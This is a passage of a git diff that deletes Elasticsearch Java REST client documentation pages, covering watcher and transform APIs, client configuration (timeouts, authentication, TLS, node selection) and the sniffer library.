- -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> If true wait for the {transform} task to stop before responding. -<2> Controls the amount of time to wait until the {transform} stops. -<3> Whether to ignore if a wildcard expression matches no {transforms}. - -include::../execution.asciidoc[] - -==== Response - -The returned +{response}+ object acknowledges the {transform} has stopped. diff --git a/docs/java-rest/high-level/transform/update_transform.asciidoc b/docs/java-rest/high-level/transform/update_transform.asciidoc deleted file mode 100644 index ffde48ae186..00000000000 --- a/docs/java-rest/high-level/transform/update_transform.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ --- -:api: update-transform -:request: UpdateTransformRequest -:response: UpdateTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Update {transform} API - -Updates an existing {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Update {transform} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The update configuration with which to update the {transform}. -<2> The ID of the configuration to update. -<3> Whether or not to wait to run deferrable validations until `_start` is called. 
-This option should be used with care as the created {transform} will run -with the privileges of the user creating it. Meaning, if they do not have privileges, -such an error will not be visible until `_start` is called. - -[id="{upid}-{api}-config"] -==== {transform-cap} update configuration - -The `TransformConfigUpdate` object contains all the details about updated -{transform} configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The source indices and query from which to gather data. -<2> The destination index and optional pipeline. -<3> How often to check for updates to the source indices. -<4> How to keep the {transform} in sync with incoming data. -<5> Optional free text description of the {transform}. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the updated {transform} configuration -or an error if the update failed or is invalid. diff --git a/docs/java-rest/high-level/watcher/ack-watch.asciidoc b/docs/java-rest/high-level/watcher/ack-watch.asciidoc deleted file mode 100644 index 7dfc3faad8e..00000000000 --- a/docs/java-rest/high-level/watcher/ack-watch.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: ack-watch -:request: AckWatchRequest -:response: AckWatchResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== Ack watch API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/actions.html#actions-ack-throttle[Acknowledging a watch] enables you -to manually throttle execution of a watch's actions. A watch can be acknowledged -through the following request: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The ID of the watch to ack. -<2> An optional list of IDs representing the watch actions that should be acked. -If no action IDs are provided, then all of the watch's actions will be acked. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the new status of the requested watch: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The status of a specific action that was acked. -<2> The acknowledgement state of the action. If the action was successfully -acked, this state will be equal to `AckStatus.State.ACKED`. 
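Putting those pieces together, acknowledging a single action and checking its
state could look like the following sketch. The watch and action IDs are made
up, and the accessor chain reflects assumptions about the high-level client's
watcher classes.

["source","java"]
--------------------------------------------------
AckWatchRequest request = new AckWatchRequest("my_watch", "logme");     // ack only the "logme" action
AckWatchResponse response = client.watcher().ackWatch(request, RequestOptions.DEFAULT);

ActionStatus actionStatus = response.getStatus().actionStatus("logme"); // per-action status
if (actionStatus.ackStatus().state() == AckStatus.State.ACKED) {
    // the action stays throttled until the watch condition becomes false again
}
--------------------------------------------------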
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/activate-watch.asciidoc b/docs/java-rest/high-level/watcher/activate-watch.asciidoc deleted file mode 100644 index 6cbe0344e34..00000000000 --- a/docs/java-rest/high-level/watcher/activate-watch.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: activate-watch -:request: ActivateWatchRequest -:response: ActivateWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Activate watch API - -[id="{upid}-{api}-request"] -==== Execution - -A watch can be activated as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the new status of the activated watch. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `watchStatus` contains status of the watch - -[id="{upid}-{api}-request-async"] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-async] --------------------------------------------------- -<1> The +{request}+ to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for +{response}+ looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc b/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc deleted file mode 100644 index 3594fda984e..00000000000 --- a/docs/java-rest/high-level/watcher/deactivate-watch.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ --- -:api: deactivate-watch -:request: deactivateWatchRequest -:response: deactivateWatchResponse -:doc-tests-file: {doc-tests}/WatcherDocumentationIT.java --- -[role="xpack"] -[[java-rest-high-watcher-deactivate-watch]] -=== Deactivate watch API - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/delete-watch.asciidoc b/docs/java-rest/high-level/watcher/delete-watch.asciidoc deleted file mode 100644 index 9e438bb16b5..00000000000 --- a/docs/java-rest/high-level/watcher/delete-watch.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-watcher-delete-watch]] -=== Delete watch API - -[[java-rest-high-x-pack-watcher-delete-watch-execution]] -==== Execution - -A watch can be deleted as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute] --------------------------------------------------- - -[[java-rest-high-x-pack-watcher-delete-watch-response]] -==== Response - -The returned `DeleteWatchResponse` contains `found`, `id`, -and `version` information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-response] --------------------------------------------------- -<1> `_id` contains id of the watch -<2> `found` is a boolean indicating whether the watch was found -<3> `_version` returns the version of the deleted watch - -[[java-rest-high-x-pack-watcher-delete-watch-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute-async] --------------------------------------------------- -<1> The `DeleteWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `DeleteWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-delete-watch-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/execute-watch.asciidoc b/docs/java-rest/high-level/watcher/execute-watch.asciidoc deleted file mode 100644 index b23b0918589..00000000000 --- a/docs/java-rest/high-level/watcher/execute-watch.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ --- -:api: execute-watch -:request: ExecuteWatchRequest -:response: ExecuteWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute watch API - -The execute watch API allows clients to immediately execute a watch, either -one that has been previously added via the -{ref}/watcher-api-put-watch.html[Put Watch API] or inline as part of the request. - -[id="{upid}-{api}-request-by-id"] -==== Execute by id - -Submit the following request to execute a previously added watch: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id] ---------------------------------------------------- -<1> Alternative input for the watch to use in json format -<2> Set the mode for action "action1" to SIMULATE -<3> Record this execution in watcher history -<4> Execute the watch regardless of the watch's condition -<5> Set the trigger data for the watch in json format -<6> Enable debug mode - -[id="{upid}-{api}-response-by-id"] -==== Execute by id response - -The returned `Response` contains details of the execution: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-response] ---------------------------------------------------- -<1> The record ID for this execution -<2> The execution response as a java `Map` -<3> Extract information from the response map using `ObjectPath` - -[id="{upid}-{api}-response-by-id-async"] -==== Asynchronous execution by id - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-execute-async] --------------------------------------------------- -<1> The `ExecuteWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `ExecuteWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-by-id-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. 
The raised exception is provided as an argument - - -[id="{upid}-{api}-request-inline"] -==== Execute inline - -Submit the following request to execute a watch defined as part of the request: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[x-pack-execute-watch-inline] ---------------------------------------------------- -<1> Alternative input for the watch to use in json format -<2> Set the mode for action "action1" to SIMULATE -<3> Execute the watch regardless of the watch's condition -<4> Set the trigger data for the watch in json format -<5> Enable debug mode - -Note that inline watches cannot be recorded. - -The response format and asynchronous execution methods are the same as for the -Execute Watch by ID API. \ No newline at end of file diff --git a/docs/java-rest/high-level/watcher/get-watch.asciidoc b/docs/java-rest/high-level/watcher/get-watch.asciidoc deleted file mode 100644 index 540f64ca947..00000000000 --- a/docs/java-rest/high-level/watcher/get-watch.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: get-watch -:request: GetWatchRequest -:response: GetWatchResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get watch API - -[id="{upid}-{api}-request"] -==== Execution - -A watch can be retrieved as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains `id`, `version`, `status` and `source` -information. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> `_id`, id of the watch -<2> `found` is a boolean indicating whether the watch was found -<3> `_version` returns the version of the watch -<4> `status` contains status of the watch -<5> `source` the source of the watch - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/watcher/put-watch.asciidoc b/docs/java-rest/high-level/watcher/put-watch.asciidoc deleted file mode 100644 index f3ab52181f2..00000000000 --- a/docs/java-rest/high-level/watcher/put-watch.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-watcher-put-watch]] -=== Put watch API - -[[java-rest-high-x-pack-watcher-put-watch-execution]] -==== Execution - -General information about the installed {watcher} features can be retrieved -using the `watcher()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute] --------------------------------------------------- -<1> Allows to store the watch, but to not trigger it. Defaults to `true` - -[[java-rest-high-x-pack-watcher-put-watch-response]] -==== Response - -The returned `PutWatchResponse` contains `created`, `id`, -and `version` information. 
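For reference, the kind of request that produces this response can be assembled
as sketched below. The watch body is deliberately tiny and abbreviated, and the
constructor signature is an assumption about the high-level client; treat the
sketch as illustrative rather than authoritative.

["source","java"]
--------------------------------------------------
// A minimal watch definition: fire every 10s and log a line
String watchJson = "{ \"trigger\": { \"schedule\": { \"interval\": \"10s\" } },"
    + " \"input\": { \"none\": {} },"
    + " \"actions\": { \"logme\": { \"logging\": { \"text\": \"{{ctx.watch_id}} fired\" } } } }";

PutWatchRequest request = new PutWatchRequest("my_watch_id",
    new BytesArray(watchJson), XContentType.JSON);
request.setActive(false); // store the watch without triggering it

PutWatchResponse response = client.watcher().putWatch(request, RequestOptions.DEFAULT);
boolean created = response.isCreated(); // true on first creation, false on update
--------------------------------------------------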
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-response] --------------------------------------------------- -<1> `_id` contains id of the watch -<2> `created` is a boolean indicating whether the watch was created for the first time -<3> `_version` returns the newly created version - -[[java-rest-high-x-pack-watcher-put-watch-async]] -==== Asynchronous execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute-async] --------------------------------------------------- -<1> The `PutWatchRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once it is -completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for `PutWatchResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/WatcherDocumentationIT.java[x-pack-put-watch-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/watcher/start-watch-service.asciidoc b/docs/java-rest/high-level/watcher/start-watch-service.asciidoc deleted file mode 100644 index 02b439e0c6a..00000000000 --- a/docs/java-rest/high-level/watcher/start-watch-service.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: start-watch-service -:request: StartWatchServiceRequest -:response: StartWatchServiceResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start watch service API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/watcher-api-start.html[Start watcher] enables you -to manually start the watch service. Submit the following request -to start the watch service: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned `AcknowledgedResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. 
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc b/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc deleted file mode 100644 index 9eeca6b2236..00000000000 --- a/docs/java-rest/high-level/watcher/stop-watch-service.asciidoc +++ /dev/null @@ -1,34 +0,0 @@ --- -:api: stop-watch-service -:request: StopWatchServiceRequest -:response: StopWatchServiceResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop watch service API - -[[java-rest-high-watcher-stop-watch-service-execution]] -==== Execution - -{ref}/watcher-api-stop.html[Stop watcher] enables you -to manually stop the watch service. Submit the following request -to stop the watch service: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[[java-rest-high-watcher-stop-watch-service-response]] -==== Response - -The returned `AcknowledgeResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/watcher/watcher-stats.asciidoc b/docs/java-rest/high-level/watcher/watcher-stats.asciidoc deleted file mode 100644 index d0e1837c26c..00000000000 --- a/docs/java-rest/high-level/watcher/watcher-stats.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: watcher-stats -:request: WatcherStatsRequest -:response: WatcherStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Watcher stats API - -[id="{upid}-{api}-request"] -==== Execution - -{ref}/watcher-api-stats.html[Watcher Stats] returns the current {watcher} metrics. -Submit the following request to get the stats: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned `AcknowledgeResponse` contains a value on whether or not the request -was received: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> A boolean value of `true` if successfully received, `false` otherwise. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/index.asciidoc b/docs/java-rest/index.asciidoc deleted file mode 100644 index 212d34f663d..00000000000 --- a/docs/java-rest/index.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-rest]] -= Java REST Client - -include::../Versions.asciidoc[] - -include::overview.asciidoc[] - -include::low-level/index.asciidoc[] - -include::high-level/index.asciidoc[] - -include::redirects.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/license.asciidoc b/docs/java-rest/license.asciidoc deleted file mode 100644 index 2ec3d151974..00000000000 --- a/docs/java-rest/license.asciidoc +++ /dev/null @@ -1,16 +0,0 @@ -== License - -Copyright 2013-2019 Elasticsearch - -Licensed under the Apache License, Version 2.0 (the "License"); -you may not use this file except in compliance with the License. 
-You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an "AS IS" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. - diff --git a/docs/java-rest/low-level/configuration.asciidoc b/docs/java-rest/low-level/configuration.asciidoc deleted file mode 100644 index d368d8362f0..00000000000 --- a/docs/java-rest/low-level/configuration.asciidoc +++ /dev/null @@ -1,189 +0,0 @@ -[[java-rest-low-config]] -== Common configuration - -As explained in <>, the `RestClientBuilder` -supports providing both a `RequestConfigCallback` and an `HttpClientConfigCallback` -which allow for any customization that the Apache Async Http Client exposes. -Those callbacks make it possible to modify some specific behaviour of the client -without overriding every other default configuration that the `RestClient` -is initialized with. This section describes some common scenarios that require -additional configuration for the low-level Java REST Client. - -=== Timeouts - -Configuring requests timeouts can be done by providing an instance of -`RequestConfigCallback` while building the `RestClient` through its builder. -The interface has one method that receives an instance of -https://hc.apache.org/httpcomponents-client-ga/httpclient/apidocs/org/apache/http/client/config/RequestConfig.Builder.html[`org.apache.http.client.config.RequestConfig.Builder`] - as an argument and has the same return type. The request config builder can -be modified and then returned. In the following example we increase the -connect timeout (defaults to 1 second) and the socket timeout (defaults to 30 -seconds). - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-timeouts] --------------------------------------------------- - -Timeouts also can be set per request with RequestOptions, which overrides RestClient customizeRequestConfig. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-request-options-timeouts] --------------------------------------------------- - -=== Number of threads - -The Apache Http Async Client starts by default one dispatcher thread, and a -number of worker threads used by the connection manager, as many as the number -of locally detected processors (depending on what -`Runtime.getRuntime().availableProcessors()` returns). The number of threads -can be modified as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-threads] --------------------------------------------------- - -=== Basic authentication - -Configuring basic authentication can be done by providing an -`HttpClientConfigCallback` while building the `RestClient` through its builder. -The interface has one method that receives an instance of -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - as an argument and has the same return type. 
The http client builder can be -modified and then returned. In the following example we set a default -credentials provider that requires basic authentication. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-basic-auth] --------------------------------------------------- - -Preemptive Authentication can be disabled, which means that every request will be sent without -authorization headers to see if it is accepted and, upon receiving an HTTP 401 response, it will -resend the exact same request with the basic authentication header. If you wish to do this, then -you can do so by disabling it via the `HttpAsyncClientBuilder`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-disable-preemptive-auth] --------------------------------------------------- -<1> Disable preemptive authentication - -=== Other authentication methods - -==== Elasticsearch Token Service tokens - -If you want the client to authenticate with an Elasticsearch access token, set the relevant HTTP request header. -If the client makes requests on behalf of a single user only, you can set the necessary `Authorization` header as a default header as shown -in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-auth-bearer-token] --------------------------------------------------- - -==== Elasticsearch API keys - -If you want the client to authenticate with an Elasticsearch API key, set the relevant HTTP request header. -If the client makes requests on behalf of a single user only, you can set the necessary `Authorization` header as a default header as shown -in the following example: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-auth-api-key] --------------------------------------------------- - -=== Encrypted communication - -Encrypted communication using TLS can also be configured through the -`HttpClientConfigCallback`. The -https://hc.apache.org/httpcomponents-asyncclient-dev/httpasyncclient/apidocs/org/apache/http/impl/nio/client/HttpAsyncClientBuilder.html[`org.apache.http.impl.nio.client.HttpAsyncClientBuilder`] - received as an argument exposes multiple methods to configure encrypted - communication: `setSSLContext`, `setSSLSessionStrategy` and - `setConnectionManager`, in order of precedence from the least important. - -When accessing an Elasticsearch cluster that is setup for TLS on the HTTP layer, the client needs to trust the certificate that -Elasticsearch is using. 
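In condensed form, the idea is to load a truststore, build an `SSLContext` from
it, and hand that context to the http client builder. The sketch below assumes a
PKCS#12 truststore; the path and password are placeholders, and the complete,
tested examples follow.

["source","java"]
--------------------------------------------------
// Placeholder path and password for a PKCS#12 truststore containing the CA certificate
KeyStore truststore = KeyStore.getInstance("pkcs12");
try (InputStream is = Files.newInputStream(Paths.get("/path/to/truststore.p12"))) {
    truststore.load(is, "truststore-password".toCharArray());
}
final SSLContext sslContext = SSLContexts.custom()
    .loadTrustMaterial(truststore, null)
    .build();

RestClientBuilder builder = RestClient.builder(new HttpHost("localhost", 9200, "https"))
    .setHttpClientConfigCallback(httpClientBuilder -> httpClientBuilder.setSSLContext(sslContext));
--------------------------------------------------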
- The following is an example of setting up the client to trust the CA that has signed the certificate that Elasticsearch is using, when - that CA certificate is available in a PKCS#12 keystore: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-encrypted-communication] --------------------------------------------------- - -The following is an example of setting up the client to trust the CA that has signed the certificate that Elasticsearch is using, when -that CA certificate is available as a PEM encoded file. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-trust-ca-pem] --------------------------------------------------- - -When Elasticsearch is configured to require client TLS authentication, for example when a PKI realm is configured, the client needs to provide -a client certificate during the TLS handshake in order to authenticate. The following is an example of setting up the client for TLS -authentication with a certificate and a private key that are stored in a PKCS#12 keystore. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-config-mutual-tls-authentication] --------------------------------------------------- - -If the client certificate and key are not available in a keystore but rather as PEM encoded files, you cannot use them -directly to build an SSLContext. You must rely on external libraries to parse the PEM key into a PrivateKey instance. Alternatively, you -can use external tools to build a keystore from your PEM files, as shown in the following example: - -``` -openssl pkcs12 -export -in client.crt -inkey private_key.pem \ - -name "client" -out client.p12 -``` - -If no explicit configuration is provided, the https://docs.oracle.com/javase/7/docs/technotes/guides/security/jsse/JSSERefGuide.html#CustomizingStores[system default configuration] -will be used. - -=== Others - -For any other required configuration needed, the Apache HttpAsyncClient docs -should be consulted: https://hc.apache.org/httpcomponents-asyncclient-4.1.x/ . - -NOTE: If your application runs under the security manager you might be subject -to the JVM default policies of caching positive hostname resolutions -indefinitely and negative hostname resolutions for ten seconds. If the resolved -addresses of the hosts to which you are connecting the client to vary with time -then you might want to modify the default JVM behavior. These can be modified by -adding -https://docs.oracle.com/javase/8/docs/technotes/guides/net/properties.html[`networkaddress.cache.ttl=`] -and -https://docs.oracle.com/javase/8/docs/technotes/guides/net/properties.html[`networkaddress.cache.negative.ttl=`] -to your -https://docs.oracle.com/javase/8/docs/technotes/guides/security/PolicyFiles.html[Java -security policy]. - -=== Node selector - -The client sends each request to one of the configured nodes in round-robin -fashion. Nodes can optionally be filtered through a node selector that needs -to be provided when initializing the client. This is useful when sniffing is -enabled, in case only dedicated master nodes should be hit by HTTP requests. 
-For each request the client will run the eventually configured node selector -to filter the node candidates, then select the next one in the list out of the -remaining ones. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/RestClientDocumentation.java[rest-client-init-allocation-aware-selector] --------------------------------------------------- -<1> Set an allocation aware node selector that allows to pick a node in the -local rack if any available, otherwise go to any other node in any rack. It -acts as a preference rather than a strict requirement, given that it goes to -another rack if none of the local nodes are available, rather than returning -no nodes in such case which would make the client forcibly revive a local node -whenever none of the nodes from the preferred rack is available. - -WARNING: Node selectors that do not consistently select the same set of nodes -will make round-robin behaviour unpredictable and possibly unfair. The -preference example above is fine as it reasons about availability of nodes -which already affects the predictability of round-robin. Node selection should -not depend on other external factors or round-robin will not work properly. diff --git a/docs/java-rest/low-level/index.asciidoc b/docs/java-rest/low-level/index.asciidoc deleted file mode 100644 index 9c7b4c0c55d..00000000000 --- a/docs/java-rest/low-level/index.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ -[[java-rest-low]] -= Java Low Level REST Client - -[partintro] --- - -The low-level client's features include: - -* minimal dependencies - -* load balancing across all available nodes - -* failover in case of node failures and upon specific response codes - -* failed connection penalization (whether a failed node is retried depends on - how many consecutive times it failed; the more failed attempts the longer the - client will wait before trying that same node again) - -* persistent connections - -* trace logging of requests and responses - -* optional automatic <> - --- - -:doc-tests: {elasticsearch-root}/client/rest/src/test/java/org/elasticsearch/client/documentation -include::usage.asciidoc[] -include::configuration.asciidoc[] - -:doc-tests: {elasticsearch-root}/client/sniffer/src/test/java/org/elasticsearch/client/sniff/documentation -include::sniffer.asciidoc[] - -include::../license.asciidoc[] - -:doc-tests!: diff --git a/docs/java-rest/low-level/sniffer.asciidoc b/docs/java-rest/low-level/sniffer.asciidoc deleted file mode 100644 index 84f1510bae4..00000000000 --- a/docs/java-rest/low-level/sniffer.asciidoc +++ /dev/null @@ -1,136 +0,0 @@ -[[sniffer]] -== Sniffer - -Minimal library that allows to automatically discover nodes from a running -Elasticsearch cluster and set them to an existing `RestClient` instance. -It retrieves by default the nodes that belong to the cluster using the -Nodes Info api and uses jackson to parse the obtained json response. - -Compatible with Elasticsearch 2.x and onwards. - -[[java-rest-sniffer-javadoc]] -=== Javadoc - -The javadoc for the REST client sniffer can be found at {rest-client-sniffer-javadoc}/index.html. - -=== Maven Repository - -The REST client sniffer is subject to the same release cycle as -Elasticsearch. Replace the version with the desired sniffer version, first -released with `5.0.0-alpha4`. There is no relation between the sniffer version -and the Elasticsearch version that the client can communicate with. 
Sniffer -supports fetching the nodes list from Elasticsearch 2.x and onwards. - -If you are looking for a SNAPSHOT version, the Elastic Maven Snapshot repository is available -at https://snapshots.elastic.co/maven/. - -==== Maven configuration - -Here is how you can configure the dependency using maven as a dependency manager. -Add the following to your `pom.xml` file: - -["source","xml",subs="attributes"] --------------------------------------------------- - - org.elasticsearch.client - elasticsearch-rest-client-sniffer - {version} - --------------------------------------------------- - -==== Gradle configuration - -Here is how you can configure the dependency using gradle as a dependency manager. -Add the following to your `build.gradle` file: - -["source","groovy",subs="attributes"] --------------------------------------------------- -dependencies { - compile 'org.elasticsearch.client:elasticsearch-rest-client-sniffer:{version}' -} --------------------------------------------------- - -=== Usage - -Once a `RestClient` instance has been created as shown in <>, -a `Sniffer` can be associated to it. The `Sniffer` will make use of the provided `RestClient` -to periodically (every 5 minutes by default) fetch the list of current nodes from the cluster -and update them by calling `RestClient#setNodes`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-init] --------------------------------------------------- - -It is important to close the `Sniffer` so that its background thread gets -properly shutdown and all of its resources are released. The `Sniffer` -object should have the same lifecycle as the `RestClient` and get closed -right before the client: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-close] --------------------------------------------------- - -The `Sniffer` updates the nodes by default every 5 minutes. This interval can -be customized by providing it (in milliseconds) as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SnifferDocumentation.java[sniffer-interval] --------------------------------------------------- - -It is also possible to enable sniffing on failure, meaning that after each -failure 